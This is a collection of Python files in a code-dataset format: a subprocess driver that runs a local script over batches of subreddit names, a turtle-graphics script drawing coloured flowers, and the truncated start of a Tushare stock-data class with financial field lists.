subprocess.call(["python","worldnews_fast.py",str(i),"dailyscripts","darkinternet","dataisbeautiful","datamining","dementia","depression","diy","documentaries","dotnet","downsyndrome","dyslexia","economics","education","eebooks","electricalengineering","electronics","engineering","engineeringtechnology","entrepreneur","epidemiology","etymology","eurodiversity","everythingscience","evolution","evopsych","explainlikeimfive","favors","finance","financialindependence","findareddit","forhire","forth"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"freelance","freelanceUK","freelanceWriters","funny","gadgets","genetics","getdisciplined","getemployed","getmotivated","getting_over_it","goldredditsays","grammar","grammarwriting","graphic_design","hacking","hardware","history","holdmybeer","homeworkhelp","html","htmlbasics","humanism","hwstartups","hypotheticalsituation","iWantToLearn","ideasfortheadmins","illegaltorrents","improvevocab","india","ineedafavor","intel","intelligence"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"interview","inventions","iwantoutjobs","java","javaTIL","javacodegeeks","javahelp","javascript","jobbit","jobsearchhacks","jokes","jquery","languagetechnology","learnjava","learnjavascript","learnmath","learnprogramming","learnpython","lectures","lifehacks","linguistics","linux","linux4noobs","linuxquestions","literature","logic","machinelearning","marketing","masculism","math","mathbooks","mathematics"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"mathpsych","matlab","mechanicalengineering","medicine","meditation","mentalhealth","mentors","metalworking","microsoft","mmfb","motivation","movies","music","mysql","needadvice","networking","neuro","neurodiversity","neurophilosophy","neuropsychology","newproducts","news","newtoreddit","nonprofit_jobs","nootropics","obvious","occupationaltherapy","ocd","offmychest","opengl","osdev","parkrangers"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"perl","philosophy","philosophyofScience","philosophyofscience","php","physics","pics","politics","privacy","product_design","productivity","programbattles","programming","programmingbuddies","programmingchallenges","psychiatry","psychology","psychopharmacology","psychotherapy","psychscience","puzzles","python","quotes","rage","rational","reasonstolive","rehabtherapy","relationship_advice","relationships","resumes","riddles","robotics"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"ruby","saneorpsycho","schizophrenia","science","scientificresearch","self","selfhelp","selfimprovement","sex","shittyaskscience","shittyideas","shittyprogramming","showerthoughts","simpleliving","slp","socialism","socialmedia","socialskills","sociology","software","softwarearchitecture","softwaredevelopment","softwaregore","solotravel","space","specialed","startups","stopselfharm","suicidology","sysadmin","systems","talesfromtechsupport"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"technology","techsupport","teenagers","testimonials","themixednuts","thisismyjob","tipofmytongue","todayilearned","tr","translationstudies","travel","tutor","ultralight","undelete","undeleteShadow","undergraduateresearch","uniqueminds","visualbasic","web_programming","webdev","whatisthis","whatstheword","windows","windowsazure","womenEngineers","words","work","workonline","worldnews","writingprompts"],shell=True)
#20 each whole list
#subprocess.call(["python","worldnews_fast.py",str(i),"24hoursupport","3amjokes","ADHD","AMA","AcademicPhilosophy","AcademicPsychology","Aerospace","Android","AndroidQuestions","Anger","Anxiety","AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AskHR","AskHistorians","AskMen","AskPhysics","AskReddit","AskScienceDiscussion"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskScienceFiction","AskSocialScience","AskWomen","Ask_Politics","Bash","BehavioralEconomics","BigDataJobs","BipolarReddit","CAD","C_Programming","ComputerScience","Confession","CoverTheWorld","Cplusplus","CppForbeginners","CrappyDesign","CrazyIdeas","DIY","DIYCompSci","DailyProgrammer","DeadBedrooms","DebateReligion"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"DecidingToBeBetter","DigitalNomad","DoesNotTranslate","ECE","Economics","EngineeringStudents","Entrepreneur","ExNoContact","FEA","FE_Exam","Feminism","FluidMechanics","Foodforthought","FoundWords","Freethought","GetMotivated","GetStudying","GraphicsProgramming","HITsWorthTurkingFor","HTMLBattles","HomeworkHelp","HowsYourJob"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"IAmA","IOPsychology","InternetIsBeautiful","LaTeX","LanguageLearning","LearnANewLanguage","LearnJava","LearnJavaScript","LifeProTips","LinguisticsHumor","LongDistance","MachineLearning","Manufacturing","MathHelp","Meditation","NetworkingJobs","Neuropsychology","NoStupidQuestions","ObjectiveC","PCMasterRace","PLC","PhilosophyofScience"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"PhsychologicalTricks","PoliticalDiscussion","Polyamory","PrintedCircuitBoard","Progether","ProgrammerHumor","Proofreading","Python","RapeCounseling","RetailManagement","STEMdents","SWORDS","SWResources","SampleSize","SanctionedSuicide","Seduction","SiblingSupport","Statistics","SuicideWatch","Swift","SysadminJobs","TechNews"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ThermalPerformance","Tinder","TinyCode","TowerOfBabel","TrueAskReddit","TrueReddit","Unix","VentureBiotech","WeMetOnline","Web_Development","WhatsTheWord","YoungJobs","academicpsychology","academicpublishing","accounting","advice","androiddev","translator","answers","asklinguistics","askmath","askphotography"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"askreddit","askscience","assistance","astronomy","audiology","autism","badcode","badlinguistics","beermoney","behavioralmedicine","behaviortherapy","bestof","bestofTLDR","bioengineering","biology","biotech","bodybuilding","bookquotes","books","breadboard","bugs","buildapc"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"business","careerguidance","cfd","changemyview","chemicalengineering","chipdesign","civilengineering","cloudcomputing","coding","coffeescript","cogneuro","cogneurocogsci","cognitivelinguistics","cogsci","compilers","complexsystems","compling","compression","compsci","computerforensics","computers","computerscience"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"conlangs","conspiracy","construction","cosmology","coursearea","cpp","cpp_questions","crypto","cryptography","cs50","csbooks","cscareerquestions","csharp","css","dae","dailyprogrammer","dailyscripts","darkinternet","dataisbeautiful","datamining","dementia","depression"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"diy","documentaries","dotnet","downsyndrome","dyslexia","economics","education","eebooks","electricalengineering","electronics","engineering","engineeringtechnology","entrepreneur","epidemiology","etymology","eurodiversity","everythingscience","evolution","evopsych","explainlikeimfive","favors","finance"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"financialindependence","findareddit","forhire","forth","freelance","freelanceUK","freelanceWriters","funny","gadgets","genetics","getdisciplined","getemployed","getmotivated","getting_over_it","goldredditsays","grammar","grammarwriting","graphic_design","hacking","hardware","history","holdmybeer"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"homeworkhelp","html","htmlbasics","humanism","hwstartups","hypotheticalsituation","iWantToLearn","ideasfortheadmins","illegaltorrents","improvevocab","india","ineedafavor","intel","intelligence","interview","inventions","iwantoutjobs","java","javaTIL","javacodegeeks","javahelp","javascript"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"jobbit","jobsearchhacks","jokes","jquery","languagetechnology","learnjava","learnjavascript","learnmath","learnprogramming","learnpython","lectures","lifehacks","linguistics","linux","linux4noobs","linuxquestions","literature","logic","machinelearning","marketing","masculism","math"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"mathbooks","mathematics","mathpsych","matlab","mechanicalengineering","medicine","meditation","mentalhealth","mentors","metalworking","microsoft","mmfb","motivation","movies","music","mysql","needadvice","networking","neuro","neurodiversity","neurophilosophy","neuropsychology"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"newproducts","news","newtoreddit","nonprofit_jobs","nootropics","obvious","occupationaltherapy","ocd","offmychest","opengl","osdev","parkrangers","perl","philosophy","philosophyofScience","philosophyofscience","php","physics","pics","politics","privacy","product_design"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"productivity","programbattles","programming","programmingbuddies","programmingchallenges","psychiatry","psychology","psychopharmacology","psychotherapy","psychscience","puzzles","python","quotes","rage","rational","reasonstolive","rehabtherapy","relationship_advice","relationships","resumes","riddles","robotics"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ruby","saneorpsycho","schizophrenia","science","scientificresearch","self","selfhelp","selfimprovement","sex","shittyaskscience","shittyideas","shittyprogramming","showerthoughts","simpleliving","slp","socialism","socialmedia","socialskills","sociology","software","softwarearchitecture","softwaredevelopment"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"softwaregore","solotravel","space","specialed","startups","stopselfharm","suicidology","sysadmin","systems","talesfromtechsupport","technology","techsupport","teenagers","testimonials","themixednuts","thisismyjob","tipofmytongue","todayilearned","tr","translationstudies","travel","tutor"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ultralight","undelete","undeleteShadow","undergraduateresearch","uniqueminds","visualbasic","web_programming","webdev","whatisthis","whatstheword","windows","windowsazure","womenEngineers","words","work","workonline","worldnews","writingprompts"],shell=True)
# ~10 subreddits per call, whole list
#subprocess.call(["python","worldnews_fast.py",str(i),"24hoursupport","3amjokes","ADHD","AMA","AcademicPhilosophy","AcademicPsychology","Aerospace","Android","AndroidQuestions","Anger","Anxiety"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AskHR","AskHistorians","AskMen","AskPhysics","AskReddit","AskScienceDiscussion","AskScienceFiction","AskSocialScience"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskWomen","Ask_Politics","Bash","BehavioralEconomics","BigDataJobs","BipolarReddit","CAD","C_Programming","ComputerScience","Confession","CoverTheWorld","Cplusplus"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"CppForbeginners","CrappyDesign","CrazyIdeas","DIY","DIYCompSci","DailyProgrammer","DeadBedrooms","DebateReligion","DecidingToBeBetter","DigitalNomad","DoesNotTranslate","ECE"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"Economics","EngineeringStudents","Entrepreneur","ExNoContact","FEA","FE_Exam","Feminism","FluidMechanics","Foodforthought","FoundWords","Freethought","GetMotivated"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"GetStudying","GraphicsProgramming","HITsWorthTurkingFor","HTMLBattles","HomeworkHelp","HowsYourJob","IAmA","IOPsychology","InternetIsBeautiful","LaTeX","LanguageLearning","LearnANewLanguage"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"LearnJava","LearnJavaScript","LifeProTips","LinguisticsHumor","LongDistance","MachineLearning","Manufacturing","MathHelp","Meditation","NetworkingJobs","Neuropsychology","NoStupidQuestions"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ObjectiveC","PCMasterRace","PLC","PhilosophyofScience","PhsychologicalTricks","PoliticalDiscussion","Polyamory","PrintedCircuitBoard","Progether","ProgrammerHumor","Proofreading","Python"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"RapeCounseling","RetailManagement","STEMdents","SWORDS","SWResources","SampleSize","SanctionedSuicide","Seduction","SiblingSupport","Statistics","SuicideWatch","Swift"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"SysadminJobs","TechNews","ThermalPerformance","Tinder","TinyCode","TowerOfBabel","TrueAskReddit","TrueReddit","Unix","VentureBiotech","WeMetOnline","Web_Development"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"WhatsTheWord","YoungJobs","academicpsychology","academicpublishing","accounting","advice","androiddev","translator","answers","asklinguistics","askmath","askphotography"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"askreddit","askscience","assistance","astronomy","audiology","autism","badcode","badlinguistics","beermoney","behavioralmedicine","behaviortherapy","bestof"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"bestofTLDR","bioengineering","biology","biotech","bodybuilding","bookquotes","books","breadboard","bugs","buildapc","business","careerguidance"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"cfd","changemyview","chemicalengineering","chipdesign","civilengineering","cloudcomputing","coding","coffeescript","cogneuro","cogneurocogsci","cognitivelinguistics","cogsci"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"compilers","complexsystems","compling","compression","compsci","computerforensics","computers","computerscience","conlangs","conspiracy","construction","cosmology"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"coursearea","cpp","cpp_questions","crypto","cryptography","cs50","csbooks","cscareerquestions","csharp","css","dae","dailyprogrammer"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"dailyscripts","darkinternet","dataisbeautiful","datamining","dementia","depression","diy","documentaries","dotnet","downsyndrome","dyslexia","economics"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"education","eebooks","electricalengineering","electronics","engineering","engineeringtechnology","entrepreneur","epidemiology","etymology","eurodiversity","everythingscience","evolution"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"evopsych","explainlikeimfive","favors","finance","financialindependence","findareddit","forhire","forth","freelance","freelanceUK","freelanceWriters","funny"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"gadgets","genetics","getdisciplined","getemployed","getmotivated","getting_over_it","goldredditsays","grammar","grammarwriting","graphic_design","hacking","hardware"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"history","holdmybeer","homeworkhelp","html","htmlbasics","humanism","hwstartups","hypotheticalsituation","iWantToLearn","ideasfortheadmins","illegaltorrents","improvevocab"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"india","ineedafavor","intel","intelligence","interview","inventions","iwantoutjobs","java","javaTIL","javacodegeeks","javahelp","javascript"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"jobbit","jobsearchhacks","jokes","jquery","languagetechnology","learnjava","learnjavascript","learnmath","learnprogramming","learnpython","lectures","lifehacks"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"linguistics","linux","linux4noobs","linuxquestions","literature","logic","machinelearning","marketing","masculism","math","mathbooks","mathematics"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"mathpsych","matlab","mechanicalengineering","medicine","meditation","mentalhealth","mentors","metalworking","microsoft","mmfb","motivation","movies"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"music","mysql","needadvice","networking","neuro","neurodiversity","neurophilosophy","neuropsychology","newproducts","news","newtoreddit","nonprofit_jobs"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"nootropics","obvious","occupationaltherapy","ocd","offmychest","opengl","osdev","parkrangers","perl","philosophy","philosophyofScience","philosophyofscience"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"php","physics","pics","politics","privacy","product_design","productivity","programbattles","programming","programmingbuddies","programmingchallenges","psychiatry"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"psychology","psychopharmacology","psychotherapy","psychscience","puzzles","python","quotes","rage","rational","reasonstolive","rehabtherapy","relationship_advice"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"relationships","resumes","riddles","robotics","ruby","saneorpsycho","schizophrenia","science","scientificresearch","self","selfhelp","selfimprovement"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"sex","shittyaskscience","shittyideas","shittyprogramming","showerthoughts","simpleliving","slp","socialism","socialmedia","socialskills","sociology","software"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"softwarearchitecture","softwaredevelopment","softwaregore","solotravel","space","specialed","startups","stopselfharm","suicidology","sysadmin","systems","talesfromtechsupport"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"technology","techsupport","teenagers","testimonials","themixednuts","thisismyjob","tipofmytongue","todayilearned","tr","translationstudies","travel","tutor"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ultralight","undelete","undeleteShadow","undergraduateresearch","uniqueminds","visualbasic","web_programming","webdev","whatisthis","whatstheword","windows","windowsazure"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"womenEngineers","words","work","workonline","worldnews","writingprompts"],shell=True)
# ~10 subreddits per call, short list
#subprocess.call(["python","worldnews_fast.py",str(i),"advice","academicpsychology","academicpublishing","accounting","Web_Development","WhatsTheWord","TrueReddit","Unix","TinyCode","TechNews","STEMdents"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ProgrammerHumor","Proofreading","Python","PhilosophyofScience","PhsychologicalTricks","PoliticalDiscussion","Neuropsychology","NoStupidQuestions","MathHelp","Meditation","LifeProTips","LinguisticsHumor"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"HomeworkHelp","HowsYourJob","Foodforthought","FoundWords","Freethought","GetMotivated","GetStudying","ECE","Economics","EngineeringStudents","CrazyIdeas","DIY"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"DIYCompSci","DailyProgrammer","Cplusplus","CppForbeginners","ComputerScience","Confession","AskSocialScience","AskWomen","Ask_Politics","Bash","BehavioralEconomics","AskPhysics"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskReddit","AskScienceDiscussion","AskHistorians","AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AcademicPhilosophy","AcademicPsychology","AskComputerScience","AskElectronics","AskEngineers"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskHistorians","TrueAskReddit","IOPsychology","InternetIsBeautiful","LearnJava","LearnJavaScript","AskPhysics","AskReddit","C_Programming","Cplusplus","CppForbeginners","HomeworkHelp"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"MathHelp","Python","answers","asklinguistics","askmath","askscience","changemyview","coding","compsci","cpp","cpp_questions","india"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"java","javacodegeeks","javahelp","learnjava","learnmath","learnprogramming","learnpython","math","news","philosophy","physics","programming"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"science","worldnews"],shell=True)
# ~20 subreddits per call, regular, short list
#subprocess.call(["python","worldnews_fast.py",str(i),"advice","academicpsychology","academicpublishing","accounting","Web_Development","WhatsTheWord","TrueReddit","Unix","TinyCode","TechNews","STEMdents","ProgrammerHumor","Proofreading","Python","PhilosophyofScience","PhsychologicalTricks","PoliticalDiscussion","Neuropsychology","NoStupidQuestions","MathHelp","Meditation"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"LifeProTips","LinguisticsHumor","HomeworkHelp","HowsYourJob","Foodforthought","FoundWords","Freethought","GetMotivated","GetStudying","ECE","Economics","EngineeringStudents","CrazyIdeas","DIY","DIYCompSci","DailyProgrammer","Cplusplus","CppForbeginners","ComputerScience","Confession","AskSocialScience","AskWomen"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"Ask_Politics","Bash","BehavioralEconomics","AskPhysics","AskReddit","AskScienceDiscussion","AskHistorians","AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AcademicPhilosophy","AcademicPsychology","AskComputerScience","AskElectronics","AskEngineers","AskHistorians","TrueAskReddit","IOPsychology","InternetIsBeautiful","LearnJava","LearnJavaScript"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskPhysics","AskReddit","C_Programming","Cplusplus","CppForbeginners","HomeworkHelp","MathHelp","Python","answers","asklinguistics","askmath","askscience","changemyview","coding","compsci","cpp","cpp_questions","india","java","javacodegeeks","javahelp","learnjava"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"learnmath","learnprogramming","learnpython","math","news","philosophy","physics","programming","science","worldnews"],shell=True)
# Scratch test: stringifying args before handing them to subprocess.
# Note that str(b) turns the whole list into the single string "[1, 2, 3]",
# so iterating over str_args[2] yields its characters, not the numbers.
# b = [1, 2, 3]
# args = ["python", "worldnews_fast.py", b]
# str_args = [str(x) for x in args]
# print(str_args[2])
# for x in str_args[2]:
#     print(x)
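# The hand-maintained batches above could be generated instead of written out
# by hand. A minimal sketch, assuming worldnews_fast.py takes an index followed
# by subreddit names as in the calls above; build_batches and run_batches are
# hypothetical helpers, not part of the original script:

def build_batches(index, subreddits, batch_size=10):
    """Yield one argv list per batch of subreddit names."""
    for start in range(0, len(subreddits), batch_size):
        batch = subreddits[start:start + batch_size]
        yield ["python", "worldnews_fast.py", str(index)] + batch

def run_batches(index, subreddits, batch_size=10):
    import subprocess
    # Passing argv as a list of strings means shell=True is unnecessary
    # (and mixing a list with shell=True behaves differently on POSIX).
    for argv in build_batches(index, subreddits, batch_size):
        subprocess.call(argv)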
aa51604546348ae15ebe25315ba544e9e56cf6f5 | 1,616 | py | Python | TurtleArt.py | heint18/Coding-Club-TurtleGraphicArt | 43c1abbe1ebb25f9855f001b1650f432dccad090 | ["MIT"] | null | null | null
import turtle
wn = turtle.Screen()
Tracy = turtle.Turtle()

# Each flower is two passes over three colours: turn 60 degrees, then draw a
# filled circle. The original called Tracy.fill(True), which was removed in
# the Python 3 turtle module; begin_fill()/end_fill() is the replacement.
def draw_flower(colors):
    for _ in range(2):
        for color in colors:
            Tracy.color(color)
            Tracy.right(60)
            Tracy.begin_fill()
            Tracy.circle(50)
            Tracy.end_fill()

# One flower in the centre and one in each corner of the window,
# with the same colour sequences as the original script.
flowers = [
    ((0, 0), ("DarkCyan", "Cyan", "dark orchid")),
    ((-200, 200), ("dark violet", "DarkMagenta", "coral")),
    ((200, 200), ("DarkTurquoise", "Cyan", "aquamarine")),
    ((200, -200), ("red", "coral", "dark salmon")),
    ((-200, -200), ("DarkCyan", "cornflower blue", "DarkGoldenrod")),
]

for (x, y), colors in flowers:
    Tracy.penup()
    Tracy.goto(x, y)
    Tracy.pendown()
    draw_flower(colors)

turtle.mainloop()
aa9db2f7e16643ffb01127e6d7674d9f628fdaf5 | 38,179 | py | Python | data_source/TushareSource.py | KevynTang/vein-project | 1a49515ac112493c1b6510d9a382c3b64629ba8e | ["MIT"] | 4 | 2021-10-01T04:54:01.000Z | 2021-11-10T05:27:01.000Z | null | null | null | 2 | 2021-09-27T05:31:34.000Z | 2022-01-29T00:43:27.000Z
from database import date_getter
from data_source.DataSource import DataSource
from data_source.tokens import TUSHARE_TOKEN
import tushare as ts
import pandas as pd
from tqdm import tqdm as pb
class TushareSource(DataSource):
def __init__(self):
super().__init__()
ts.set_token(TUSHARE_TOKEN)
self.query = ts.pro_api().query
self.stock_list = pd.DataFrame()
self.trade_date_list = {
'daily': pd.DataFrame(),
'weekly': pd.DataFrame(),
'monthly': pd.DataFrame()
}
self.quarter_end_date_list = pd.DataFrame()
self.fields = {
'INDEX_LIST': {
'raw': 'ts_code,name,fullname,market,publisher,index_type,category,base_date,base_point,list_date,weight_rule,desc,exp_date',
'ordered': ['ts_code', 'name', 'fullname', 'market', 'publisher', 'index_type', 'category', 'base_date', 'base_point',
'weight_rule', 'desc', 'list_date', 'exp_date']
},
'STOCK_LIST': {
'raw': 'ts_code,name,area,industry,cnspell,market,exchange,list_status,list_date,delist_date,is_hs',
'ordered': [
'ts_code', 'name', 'cnspell', 'exchange', "market", 'area', 'industry',
'list_status', 'list_date', 'delist_date', 'is_hs']
},
'INDICES_DAILY': {
'raw': 'ts_code,trade_date,open,close,low,high,vol',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'vol']
},
'INDICES_WEEKLY': {
'raw': 'ts_code,trade_date,open,close,low,high,vol',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'vol']
},
'INDICES_MONTHLY': {
'raw': 'ts_code,trade_date,open,close,low,high,vol',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'vol']
},
'QUOTATIONS_DAILY': {
'raw': 'ts_code,trade_date,open,close,low,high,pre_close,change,vol,amount',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'pre_close', 'change', 'vol', 'amount']
},
'STOCK_INDICATORS_DAILY': {
'raw': 'ts_code,trade_date,total_share,float_share,free_share',
'ordered': ['ts_code','trade_date','total_share','float_share','free_share']
},
'QUOTATIONS_WEEKLY': {
'raw': 'ts_code,trade_date,open,close,low,high,pre_close,change,vol,amount',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'pre_close', 'change', 'vol', 'amount']
},
'QUOTATIONS_MONTHLY': {
'raw': 'ts_code,trade_date,open,close,low,high,pre_close,change,vol,amount',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'pre_close', 'change', 'vol', 'amount']
},
'LIMITS_STATISTIC': {
'raw': 'trade_date,ts_code,fd_amount,first_time,last_time,open_times,limit',
'ordered': ['ts_code', 'trade_date', 'limit', 'first_time', 'last_time', 'open_times', 'fd_amount']
},
'ADJ_FACTORS': {
'raw': 'trade_date,ts_code,adj_factor',
'ordered': ['ts_code', 'trade_date', 'adj_factor']
},
'INCOME_STATEMENTS': {
'raw': 'ts_code,ann_date,f_ann_date,end_date,report_type,comp_type,end_type,basic_eps,diluted_eps,total_revenue,revenue,int_income,prem_earned,comm_income,n_commis_income,n_oth_income,n_oth_b_income,prem_income,out_prem,une_prem_reser,reins_income,n_sec_tb_income,n_sec_uw_income,n_asset_mg_income,oth_b_income,fv_value_chg_gain,invest_income,ass_invest_income,forex_gain,total_cogs,oper_cost,int_exp,comm_exp,biz_tax_surchg,sell_exp,admin_exp,fin_exp,assets_impair_loss,prem_refund,compens_payout,reser_insur_liab,div_payt,reins_exp,oper_exp,compens_payout_refu,insur_reser_refu,reins_cost_refund,other_bus_cost,operate_profit,non_oper_income,non_oper_exp,nca_disploss,total_profit,income_tax,n_income,n_income_attr_p,minority_gain,oth_compr_income,t_compr_income,compr_inc_attr_p,compr_inc_attr_m_s,ebit,ebitda,insurance_exp,undist_profit,distable_profit,rd_exp,fin_exp_int_exp,fin_exp_int_inc,transfer_surplus_rese,transfer_housing_imprest,transfer_oth,adj_lossgain,withdra_legal_surplus,withdra_legal_pubfund,withdra_biz_devfund,withdra_rese_fund,withdra_oth_ersu,workers_welfare,distr_profit_shrhder,prfshare_payable_dvd,comshare_payable_dvd,capit_comstock_div,net_after_nr_lp_correct,credit_impa_loss,net_expo_hedging_benefits,oth_impair_loss_assets,total_opcost,amodcost_fin_assets,oth_income,asset_disp_income,continued_net_profit,end_net_profit',
'ordered': ['ts_code', 'ann_date', 'f_ann_date', 'end_date', 'report_type', 'comp_type', 'end_type', 'basic_eps', 'diluted_eps', 'total_revenue', 'revenue', 'int_income', 'prem_earned', 'comm_income', 'n_commis_income', 'n_oth_income', 'n_oth_b_income', 'prem_income', 'out_prem', 'une_prem_reser', 'reins_income', 'n_sec_tb_income', 'n_sec_uw_income', 'n_asset_mg_income', 'oth_b_income', 'fv_value_chg_gain', 'invest_income', 'ass_invest_income', 'forex_gain', 'total_cogs', 'oper_cost', 'int_exp', 'comm_exp', 'biz_tax_surchg', 'sell_exp', 'admin_exp', 'fin_exp', 'assets_impair_loss', 'prem_refund', 'compens_payout', 'reser_insur_liab', 'div_payt', 'reins_exp', 'oper_exp', 'compens_payout_refu', 'insur_reser_refu', 'reins_cost_refund', 'other_bus_cost', 'operate_profit', 'non_oper_income', 'non_oper_exp', 'nca_disploss', 'total_profit', 'income_tax', 'n_income', 'n_income_attr_p', 'minority_gain', 'oth_compr_income', 't_compr_income', 'compr_inc_attr_p', 'compr_inc_attr_m_s', 'ebit', 'ebitda', 'insurance_exp', 'undist_profit', 'distable_profit', 'rd_exp', 'fin_exp_int_exp', 'fin_exp_int_inc', 'transfer_surplus_rese', 'transfer_housing_imprest', 'transfer_oth', 'adj_lossgain', 'withdra_legal_surplus', 'withdra_legal_pubfund', 'withdra_biz_devfund', 'withdra_rese_fund', 'withdra_oth_ersu', 'workers_welfare', 'distr_profit_shrhder', 'prfshare_payable_dvd', 'comshare_payable_dvd', 'capit_comstock_div', 'net_after_nr_lp_correct', 'credit_impa_loss', 'net_expo_hedging_benefits', 'oth_impair_loss_assets', 'total_opcost', 'amodcost_fin_assets', 'oth_income', 'asset_disp_income', 'continued_net_profit', 'end_net_profit']
},
'BALANCE_SHEETS':{
                'raw': 'ts_code,ann_date,f_ann_date,end_date,report_type,comp_type,end_type,total_share,cap_rese,undistr_porfit,surplus_rese,special_rese,money_cap,trad_asset,notes_receiv,accounts_receiv,oth_receiv,prepayment,div_receiv,int_receiv,inventories,amor_exp,nca_within_1y,sett_rsrv,loanto_oth_bank_fi,premium_receiv,reinsur_receiv,reinsur_res_receiv,pur_resale_fa,oth_cur_assets,total_cur_assets,fa_avail_for_sale,htm_invest,lt_eqt_invest,invest_real_estate,time_deposits,oth_assets,lt_rec,fix_assets,cip,const_materials,fixed_assets_disp,produc_bio_assets,oil_and_gas_assets,intan_assets,r_and_d,goodwill,lt_amor_exp,defer_tax_assets,decr_in_disbur,oth_nca,total_nca,cash_reser_cb,depos_in_oth_bfi,prec_metals,deriv_assets,rr_reins_une_prem,rr_reins_outstd_cla,rr_reins_lins_liab,rr_reins_lthins_liab,refund_depos,ph_pledge_loans,refund_cap_depos,indep_acct_assets,client_depos,client_prov,transac_seat_fee,invest_as_receiv,total_assets,lt_borr,st_borr,cb_borr,depos_ib_deposits,loan_oth_bank,trading_fl,notes_payable,acct_payable,adv_receipts,sold_for_repur_fa,comm_payable,payroll_payable,taxes_payable,int_payable,div_payable,oth_payable,acc_exp,deferred_inc,st_bonds_payable,payable_to_reinsurer,rsrv_insur_cont,acting_trading_sec,acting_uw_sec,non_cur_liab_due_1y,oth_cur_liab,total_cur_liab,bond_payable,lt_payable,specific_payables,estimated_liab,defer_tax_liab,defer_inc_non_cur_liab,oth_ncl,total_ncl,depos_oth_bfi,deriv_liab,depos,agency_bus_liab,oth_liab,prem_receiv_adva,depos_received,ph_invest,reser_une_prem,reser_outstd_claims,reser_lins_liab,reser_lthins_liab,indept_acc_liab,pledge_borr,indem_payable,policy_div_payable,total_liab,treasury_share,ordin_risk_reser,forex_differ,invest_loss_unconf,minority_int,total_hldr_eqy_exc_min_int,total_hldr_eqy_inc_min_int,total_liab_hldr_eqy,lt_payroll_payable,oth_comp_in